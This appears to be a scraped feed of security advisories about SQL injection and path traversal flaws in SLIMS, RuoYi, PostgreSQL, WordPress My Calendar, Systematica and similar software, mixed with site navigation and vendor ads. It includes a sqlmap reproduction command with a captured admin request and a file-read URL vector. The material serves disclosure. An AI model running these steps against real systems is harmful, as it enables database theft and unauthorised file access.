A vulnerability was found in SourceCodester User Registration and Login System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /endpoint/add-user.php. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-246614 is the identifier assigned to this vulnerability.

CVE-2023-6464

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/staff_act.php.

**The Bug**

A SQL Injection exists in admin/modules/reporting/customs/staff_act.php at the code below

	// create datagrid
	$reportgrid = new report\_datagrid();
	$reportgrid\->setSQLColumn('u.realname AS \\''.\_\_('Real Name').'\\'',
    	'u.username AS \\''.\_\_('Login Username').'\\'',
    	'u.user\_id AS \\''.\_\_('Bibliography Data Entry').'\\'',
    	'u.user\_id AS \\''.\_\_('Item Data Entry').'\\'',
    	'u.user\_id AS \\''.\_\_('Member Data Entry').'\\'',
    	'u.user\_id AS \\''.\_\_('Loans').'\\'',
    	'u.user\_id AS \\''.\_\_('Returns').'\\'',
    	'u.user\_id AS \\''.\_\_('Extends').'\\'');
	$reportgrid\->setSQLorder('realname ASC');

	// is there any search
	$criteria = 'user\_id IS NOT NULL ';
	$reportgrid\->setSQLCriteria($criteria);

	$start\_date = '2000-01-01';
	if (isset($\_GET\['startDate'\])) {
    	$start\_date = $\_GET\['startDate'\]; // unsanitized input 1
	}
	$until\_date = date('Y-m-d');
	if (isset($\_GET\['untilDate'\])) {
    	$until\_date = $\_GET\['untilDate'\]; // unsanitized input 2
	}

**To Reproduce**  
Steps to reproduce the behavior:

1.  Login as admin or user that has access to Staff Activity Reporting
2.  Make sure the burp is on to capture the request as below

3.  Save the request into a file (example.req)
4.  Run the test with sqlmap with the command
    
        sqlmap command:
        sqlmap -r example.req --level 5 --risk 3 -p startDate --random-agent --dbms=mysql --current-user
        
    
5.  It's in  
    

**example.req**

    GET /slims9_bulian-9.6.1/admin/modules/reporting/customs/staff_act.php?startDate=2000-01-01&untilDate=2023-08-2&applyFilter=Apply+Filter&reportView=true HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=reporting
    Cookie: SenayanAdmin=68n7ojemg853g6ipos463oo2o2; admin_logged_in=1; SenayanMember=nva8k0bovrr32qckn46cs9u46h
    Upgrade-Insecure-Requests: 1
    

**Screenshots**

**proof-of-concept current user**  

**Versions**

*   OS: Windows
*   Browser: Firefox | 116.0.3 (64-bit)
*   Slims Version: slims9\_bulian-9.6.1

**Notes**

CVE-2023-48893: Vuln0wned Report: SQL Injection in staff_act.php · Issue #209 · slims/slims9_bulian

Senayan Library Management Systems (Slims) 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/fines_report.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48813: CVE-ID-not-yet/slims/slims9_bulian-9.6.1-SQLI-fines_report.md at main · komangsughosa/CVE-ID-not-yet

RuoYi up to v4.6 was discovered to contain a SQL injection vulnerability via /system/dept/edit.

**RuoYi vulnerable to SQL injection vulnerability**

High severity GitHub Reviewed Published Dec 1, 2023 to the GitHub Advisory Database • Updated Dec 1, 2023

GHSA-fg29-37px-c7wm: RuoYi vulnerable to SQL injection vulnerability

CVE-2023-49371: RuoYi-v4.6-vulnerability/Ruoyiv4.6.md at main · Maverickfir/RuoYi-v4.6-vulnerability

Red Hat Security Advisory 2023-7616-01 - An update for postgresql is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7616.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql security updateAdvisory ID:        RHSA-2023:7616-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7616Issue date:         2023-11-30Revision:           01CVE Names:          CVE-2023-5868====================================================================Summary: An update for postgresql is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5868References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2228111https://bugzilla.redhat.com/show_bug.cgi?id=2247168https://bugzilla.redhat.com/show_bug.cgi?id=2247169https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7616-01

Restaurant Table Booking System V1.0 is vulnerable to SQL Injection in rtbs/admin/index.php via the username parameter.

CVE-2023-48016: cves/CVE-2023-48016-restaurant-table-booking-system-SQLInjection.md at main · Serhatcck/cves

SQL injection vulnerability in Packers and Movers Management System v.1.0 allows a remote attacker to execute arbitrary code via crafted payload to the /mpms/admin/?page=user/manage_user&id file.

CVE-2023-46956: bug_reports/packers-and-movers-management-system/SQL-1.md at main · geilihan/bug_reports

Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)

**CVE-2021-35975**

Systematica SMTP Adapter versions prior to v2.0.1.101 are vulnerable to directory traversal, which may allow an attacker to read sensitive files.

CVSS v2: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVSS v2 Score (BS): 3

CVSS v3: (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

CVSS v3 Score (BS): 3.0

**Information**

**Description:** Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL.

Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)

**Class:** Design Error

**Researcher:** Vadim Golovanov

**Issue date:** 2021-05-29 (Initial Advisory)

**Private release:** 2021-06-30

**Public release:** 2021-08-21

**Disclosure Link:**

**NIST CVE Link:**

**CWE:** 22 or 36 - Absolute Path Traversal

**POC**

**An example of vector:**

****

SMTP adapter http://SERVER:PORT/info?page=logfile&file=C:/windows/win.ini

ALSO ACTUAL FOR:

HTTP adapter, MSSQL MessageBus Proxy, Financial Calculator, FIX Adapter and others...

**POST RE-FINDING CVE:**

****

**CVE-2022-39838** https://github.com/jet-pentest/CVE-2022-39838

**Screenshots:**

********

CVE-2021-35975: GitHub - fbkcs/CVE-2021-35975: Path Traversal Vulnerability in Systematica SMTP Adapter and other sub-products

The 'My Calendar' WordPress Plugin, version < 3.4.22 is affected by an unauthenticated SQL injection vulnerability in the 'from' and 'to' parameters in the '/my-calendar/v1/events' rest route.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

**Tenable Advisory ID:** TRA-2023-40

**Credit:**  
Joshua Martinelle

**CVSSv3 Base / Temporal Score:**  
8.6

**CVSSv3 Vector:**  
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**  
My Calendar WordPress Plugin < 3.4.22

**Risk Factor:**  
High

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable Vulnerability Management. A representative will be in touch soon.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable Vulnerability Management. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Learn How Tenable Helps Achieve SLCGP Cybersecurity Plan Requirements**

Tenable solutions help fulfill all SLCGP requirements. Connect with a Tenable representative to learn more.

Tag

#sql